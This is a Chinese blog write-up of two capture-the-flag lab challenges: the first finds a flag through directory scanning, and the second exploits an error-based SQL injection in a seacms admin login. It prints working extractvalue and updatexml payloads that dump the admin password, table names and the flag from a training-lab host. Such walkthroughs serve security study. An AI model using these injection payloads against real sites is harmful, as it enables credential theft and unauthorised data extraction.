尤里的复仇II 回归

本文介绍了渗透测试初期的信息收集技巧,通过目录扫描找到目标网站的二级目录获取flag。接着展示了如何利用SQL注入漏洞,识别CMS类型,找到数据库名、表名、字段及数据,最终在数据库中获取flag。过程包括使用御剑扫描、F12查看器、POC验证等方法。
摘要由CSDN通过智能技术生成

渗透第一步-信息收集 1

Tips:
信息收集作为渗透测试的第一步,能决定后续测试的走向,甚至能直接找到目标的漏洞,那么如何才能在繁杂的网络世界里找到所需的数据呢?
尤里开始了努力……
最终他找到了目标的……
成功掌握了这一技能
基础目录扫描 传送门

题解:非常简单的目录扫描
直接用御剑扫描
在这里插入图片描述

不过flag在二级目录里
在这里插入图片描述

flag_{oh!you_find_it!}
在这里插入图片描述

渗透第一步-信息收集 2

Tips:
经过上次的事件,尤里深刻了解到信息收集的重要性,这次他决定利用信息收集轻松搞定个站点……
这个cms好像有个sql注入漏洞,找到它,拿到数据库里的flag吧!
传送门
开始拿到这题,先做了指纹识别,识别不出来就F12查看器查到了seacms
去网上查了poc,发现后台http://oovw8022.ia.aqlab.cn:8022/caidian/admin/?r=login有报错注入,抓包
在这里插入图片描述

user=123' or extractvalue(1,concat((select concat(0x7e,password,0x7e) from manage)))#&password=
或者
user=123' or updatexml(1,concat((select concat(0x7e,password,0x7e) from manage)),0)#&password=

拿到user:zkaqsea
在这里插入图片描述

拿到密码:seazkaq在这里插入图片描述
在这里插入图片描述

登入后台:在这里插入图片描述
没有发现flag,想着后台还有漏洞,去网上查了下,突然再看了一遍题目,flag在数据库里,入坑了
又去抓包
查库名

1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)# ---caidian

查表名

1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) # ---adword,content,download,flag,im

查字段

1' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1),0x7e),1) # ---flag

查具体数据

1' or updatexml(1,concat(0x7e,(select flag from flag limit 0,1),1),1) # ---flag_{oh!congratulations!}

果然拿到flag!

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sparename

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值